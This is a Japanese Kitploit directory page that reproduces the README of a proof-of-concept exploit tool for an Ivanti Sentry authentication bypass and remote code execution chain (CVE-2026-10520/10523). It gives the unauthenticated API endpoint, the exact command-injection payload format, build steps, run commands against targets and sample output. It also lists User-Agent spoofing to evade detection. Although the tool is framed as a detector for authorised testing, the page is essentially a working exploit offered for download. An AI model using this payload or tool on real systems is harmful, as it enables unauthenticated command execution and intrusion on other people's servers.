Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-10523-Ivanti-sentry — Ivanti Sentry認証バイパスおよびリモートコード実行脆弱性(CVE-2026-10520、CVE-2026-10523)の概念実証検出ツール。巧妙に細工されたAPIリクエストを送信してシステムコマンドを実行し、脆弱なデプロイメントを検証します。 | Kitploit
ツール/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロール認証
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ivanti Sentry認証バイパスおよびリモートコード実行脆弱性(CVE-2026-10520、CVE-2026-10523)の概念実証検出ツール。巧妙に細工されたAPIリクエストを送信してシステムコマンドを実行し、脆弱なデプロイメントを検証します。

リポジトリを見るウェブサイト
3132ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-10523 - Ivanti Sentry RCE 検出ツール

認証バイパスとリモートコード実行に関連するIvanti Sentryの脆弱性をテストするための包括的な概念実証検出ツールです。このツールは、CVE-2026-10520およびCVE-2026-10523に対して脆弱なシステムを特定します。

概要

このプロジェクトは、Ivanti Sentryインスタンスが重大な認証バイパスおよびリモートコード実行の欠陥に対して脆弱かどうかを検出および検証するために設計されています。このツールは、Ivanti Sentry APIエンドポイントを通じて特別に細工されたメッセージを送信し、システムコマンドを実行して結果を抽出することで、セキュリティ研究者やペネトレーションテスターが脆弱なデプロイメントを特定できるようにします。

脆弱性の詳細

CVE-2026-10520

Ivanti Sentryにおける認証バイパスの脆弱性で、制限されたAPIエンドポイントへの認証なしのアクセスを許可します。

CVE-2026-10523

Ivanti Sentryにおけるリモートコード実行の脆弱性で、認証バイパスと組み合わせることでメッセージングAPIを通じて任意のシステムコマンドの実行を許可します。

機能

  • 脆弱なIvanti Sentryインスタンスの認証なし検出
  • 概念実証検証のためのシステムコマンド実行機能
  • TLS検証バイパスを含むHTTPおよびHTTPS接続のサポート
  • 中間者経由のテストのためのプロキシサポート
  • XMLレスポンスからのクリーンなコマンド出力抽出
  • 情報提供付きの安全なエラーハンドリング
  • 設定可能なタイムアウトとレスポンスサイズ制限

必要条件

  • Go 1.26.4 以上
  • 対象のIvanti Sentryインスタンスへのネットワークアクセス
  • プロトコル付きの有効なターゲットURL (HTTP または HTTPS)

インストール

リポジトリをクローンし、プロジェクトディレクトリに移動します:

root@kitploit:~
git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
cd CVE-2026-10523-Ivanti-sentry

初期化とパッケージライブラリの取得

root@kitploit:~
go mod init CVE-2026-10523-Ivanti-sentry
go mod tidy

実行ファイルをビルドします:

root@kitploit:~
go build -o tot_poc tot_poc.go

使用方法

Screen Capture

このツールには、ターゲットURLと実行するコマンドの2つの必須パラメータが必要です。

基本的な使い方

Screen Capture

ターゲット上で簡単なコマンドを実行します:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "uname -a"

コマンドラインオプション

  • -url (必須): プロトコルを含むターゲットベースURL (例: https://127.0.0.1:8443)
  • -cmd (必須): 脆弱性検出のために実行するコマンド (例: "uname -a", "id", "whoami")
  • -p または -proxy (オプション): トラフィックをルーティングするためのプロキシアドレスとポート (例: 127.0.0.1:8080)

使用例

Screen Capture

簡単なシステム情報コマンドで脆弱性を検出:

root@kitploit:~
./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"

プロキシ設定で実行:

root@kitploit:~
./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080

システム情報を抽出するコマンドを実行:

root@kitploit:~
./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"

出力

ツールは以下を表示します:

  1. 脆弱性情報を含むバナー
  2. ターゲットURL、コマンド、およびプロキシ設定(該当する場合)
  3. リクエストの進行状況を示すリアルタイムステータスメッセージ
  4. ターゲットが脆弱な場合のコマンド実行結果
  5. ターゲットが脆弱でない場合や接続が失敗した場合のエラーメッセージ

成功した検出の出力

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[+] Target appears to be vulnerable.

Command output:
Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux

失敗した検出の出力

root@kitploit:~
Target: https://192.168.1.100:8443
Command: uname -a

[+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
[-] Target does not appear to be vulnerable.

技術的詳細

攻撃ベクトル

このツールは、認証なしでアクセス可能な/mics/api/v2/sentry/mics-config/handleMessageエンドポイントを利用します。ペイロードは次のように構築されます:

root@kitploit:~
message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>

レスポンスには、successタグ内にXML形式のコマンド出力が含まれます。

セキュリティ機能

  • 自己署名証明書テストのためのTLS検証バイパス
  • ハングリクエストを防ぐための設定可能なHTTPタイムアウト
  • メモリ枯渇を防ぐためのレスポンスサイズ制限 (10 MB)
  • 不正なレスポンスに対する適切なエラーハンドリング
  • 簡単な検出メカニズムを回避するためのUser-Agentスプーフィング

仕組み

  1. ターゲットURLとコマンドのコマンドライン引数を解析
  2. オプションのプロキシ設定でHTTPクライアントを作成
  3. ユーザー提供のコマンドでペイロードを構築
  4. 脆弱なエンドポイントにPOSTリクエストを送信
  5. XMLレスポンス構造からコマンド出力を抽出
  6. 結果またはエラーメッセージを適宜表示

免責事項

このツールは、認可されたセキュリティテストおよび研究目的のみで提供されます。ユーザーは、いかなるシステムをテストする前に適切な認可を得ていることを確認する責任を負います。コンピュータシステムへの不正アクセスは違法です。作者は、このツールの誤用または損害について一切の責任を負いません。

要件と制限

  • ターゲットは脆弱なIvanti Sentryインスタンスである必要があります
  • ターゲットシステムへのネットワーク接続が必要です
  • デフォルトのタイムアウトはリクエストあたり10秒です
  • 最大レスポンスサイズは10 MBに制限されています
  • 脆弱なバージョンのIvanti Sentryを実行しているシステムでのみ有効です
  • テスト目的でTLS証明書の検証が無効になっています

作者

GhostGTR666 - Gagaltotal666

リポジトリ

https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

ライセンス

このプロジェクトは、セキュリティ研究および教育目的のために現状のまま提供されます。

参考文献

  • CVE-2026-10520: Ivanti Sentry 認証バイパス
  • CVE-2026-10523: Ivanti Sentry リモートコード実行
ツールをダウンロード